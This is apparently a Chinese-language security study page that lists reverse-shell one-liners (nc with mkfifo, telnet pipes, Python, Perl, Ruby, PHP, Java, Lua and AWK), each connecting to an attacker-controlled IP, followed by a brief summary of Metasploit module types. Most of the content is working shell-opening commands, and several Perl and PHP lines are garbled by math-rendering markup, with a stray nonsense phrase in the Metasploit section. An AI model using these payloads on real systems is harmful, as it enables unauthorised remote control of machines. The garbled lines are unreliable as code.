<p>由于现在很多主机上可能没有netcat了，所以如果遇到虽然有netcat 但不支持 nc -e /bin/bash 攻击主机ip port 中 -e选项的主机，还可以这样反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f</p>
<p>rm /tmp/f 删除命令
mkfifo /tmp/f; 在tmp目录下写fifo文件f
/bin/sh -i 2&gt;&amp;1 将/bin/sh 的标准错误重定向到标准输出
nc x.x.x.x 2333 &gt;/tmp/f将nc监听到的输入 输入到fifo
0x03. telnet反弹
在攻击主机上打开两个终端分别监听 1234 和 4321端口,(确保端口开放，并且不被占用)，得到反弹shell后，1234 终端 输入命令， 4321 终端就会获得执行相应命令后的结果：
nc -lvvp 1234</p>
<p>nc -lvvp 4321
在目标主机上执行：
telnet 攻击主机ip 1234 | /bin/bash | telnet 攻击主机ip 4321
常见脚本反弹</p>
<p>脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述</p>
<ol>
<li>python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
1</li>
<li>perl
方法一：</li>
</ol>
<p>perl -e 'use Socket;<span class="arithmatex"><span class="MathJax_Preview">i="x.x.x.x";</span><script type="math/tex">i="x.x.x.x";</script></span>p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(<span class="arithmatex"><span class="MathJax_Preview">p,inet_aton(</span><script type="math/tex">p,inet_aton(</script></span>i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'
1
方法二：</p>
<p>perl -MIO -e '<span class="arithmatex"><span class="MathJax_Preview">p=fork;exit,if(</span><script type="math/tex">p=fork;exit,if(</script></span>p);<span class="arithmatex"><span class="MathJax_Preview">c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN-&gt;fdopen(</span><script type="math/tex">c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen(</script></span>c,r);<span class="arithmatex"><span class="MathJax_Preview">~-&gt;fdopen(</span><script type="math/tex">~->fdopen(</script></span>c,w);system<span class="arithmatex"><span class="MathJax_Preview">_ while&lt;&gt;;'
3. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
4. PHP
php -r '</span><script type="math/tex">_ while<>;'
3. Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
4. PHP
php -r '</script></span>sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'
5. Java
    public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
     public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/x.x.x.x/5555;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
     }
     }
6. Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3');"
7. AWK 反弹
攻击的机器监听，在收到shell的时候不可以输入enter，不然会断开</p>
<p>awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/8080";for(;s|&amp;getline c;close&copy;)while(c|getline)print|&s;c</p>
<p>14、简述MSF的模块和其作用
1)辅助模块扫描、口令破解、敏感信息嗅探等;电中国垃家航合
2)渗透攻击模块利用发现的安全漏洞对目标进行攻击，植入运行攻击载荷
payload获取目标系统访问权:
3)编码器模块进行编码保证不会出现坏字符，还可以做免杀处理;
4)后渗透攻击模块获取敏感信息，实施跳板攻击等</p>

  <hr>
<div class="md-source-file">
  <small>
    
      最后更新:
      <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_datetime">2022-02-22 23:38:31</span>
      
    
  </small>
</div>

              
            </article>
          </div>
        </div>
        
          <a href="#" class="md-top md-icon" data-md-component="top" data-md-state="hidden">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12z"/></svg>
            回到页面顶部
          </a>
        
      </main>
      
        <footer class="md-footer">
  
    <nav class="md-footer__inner md-grid" aria-label="页脚">
      
        
        <a href="../%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" class="md-footer__link md-footer__link--prev" aria-label="上一页: 应急响应" rel="prev">
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12z"/></svg>
          </div>
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                上一页
              </span>
              应急响应
            </div>
          </div>
        </a>
      
      
        
        <a href="../%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E9%A1%B9%E7%9B%AE%E6%A2%B3%E7%90%86/" class="md-footer__link md-footer__link--next" aria-label="下一页: 安全测试项目梳理" rel="next">
          <div class="md-footer__title">
            <div class="md-ellipsis">
              <span class="md-footer__direction">
                下一页
              </span>
              安全测试项目梳理
            </div>
          </div>
          <div class="md-footer__button md-icon">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11H4z"/></svg>
          </div>
        </a>
      
    </nav>
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
    <div class="md-copyright__highlight">
      Copyright &copy; 2017 - 2022
    </div>
  
  <a >keep learning ，stay foolish ，continue thinking</a>
  
</div>
      
        <div class="md-social">
  
    
    
    <a href="https://github.com/klsfct" target="_blank" rel="noopener" title="圆周 on github" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    <script id="__config" type="application/json">{"base": "../..", "features": ["navigation.instant", "navigation.tracking", "navigation.tabs", "navigation.sections", "navigation.expand", "navigation.indexes", "navigation.top", "header.autohide"], "translations": {"clipboard.copy": "\u590d\u5236", "clipboard.copied": "\u5df2\u590d\u5236", "search.config.lang": "ja", "search.config.pipeline": "trimmer, stemmer", "search.config.separator": "[\\uff0c\\u3002]+", "search.placeholder": "\u641c\u7d22", "search.result.placeholder": "\u952e\u5165\u4ee5\u5f00\u59cb\u641c\u7d22", "search.result.none": "\u6ca1\u6709\u627e\u5230\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.one": "\u627e\u5230 1 \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.other": "# \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.more.one": "\u5728\u8be5\u9875\u4e0a\u8fd8\u6709 1 \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.more.other": "\u5728\u8be5\u9875\u4e0a\u8fd8\u6709 # \u4e2a\u7b26\u5408\u6761\u4ef6\u7684\u7ed3\u679c", "search.result.term.missing": "\u7f3a\u5c11", "select.version.title": "\u9009\u62e9\u5f53\u524d\u7248\u672c"}, "search": "../../assets/javascripts/workers/search.22074ed6.min.js"}</script>
    
    
      <script src="../../assets/javascripts/bundle.960e086b.min.js"></script>
      
        <script src="../../js/google-tongji.js"></script>
      
    
  </body>
</html>